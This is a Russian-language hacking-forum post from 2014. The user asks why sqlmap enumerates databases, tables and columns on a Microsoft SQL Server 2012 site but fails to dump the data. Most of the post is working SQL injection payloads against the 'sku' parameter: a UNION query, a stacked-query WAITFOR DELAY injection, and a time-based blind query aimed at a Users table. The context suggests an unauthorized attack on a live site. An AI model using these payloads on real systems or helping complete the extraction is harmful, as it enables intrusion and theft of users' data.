Показать сообщение отдельно

  #2  
Старый 13.01.2014, 16:25
-=Cerberus=-
Познавший АНТИЧАТ
Регистрация: 29.04.2012
Сообщений: 1,266
С нами: 7388246

Репутация: 391


По умолчанию

Народ подскажите в чем беда.

использую SQLMAP, язва такого рода

back-end DBMS: Microsoft SQL Server 2012

Place: GET

Parameter: sku

Type: UNION query

Title: Generic UNION query (NULL) - 1 column

Payload: sku=-2896' UNION ALL SELECT CHAR(113)+CHAR(118)+CHAR(102)+CHAR(111)+CHAR(113)+ CHAR(121)+CHAR(73)+CHAR(87)+C

HAR(122)+CHAR(67)+CHAR(74)+CHAR(85)+CHAR(104)+CHAR (82)+CHAR(79)+CHAR(113)+CHAR(103)+CHAR(119)+CHAR(1 14)+CHAR(113)--

Type: stacked queries

Title: Microsoft SQL Server/Sybase stacked queries

Payload: sku=USUSUSU'; WAITFOR DELAY '0:0:5'--

имена баз данных достает нормально, таблицы с текущей тоже все ок, колонки с таблицы ок, а вот данные не хочет тянуть!

так пытается достать инфу

sku=USUSUSU'; IF(UNICODE(SUBSTRING((SELECT ISNULL(CAST(LTRIM(STR(COUNT(*))) AS NVARCHAR(4000)),CHAR(32)) FROM dbname.dbo.Users),1,1))>1) WAITFOR DELAY '0:0:5'--

в чём может быть косяк??? заранее благодарен за ответы!
 
Ответить с цитированием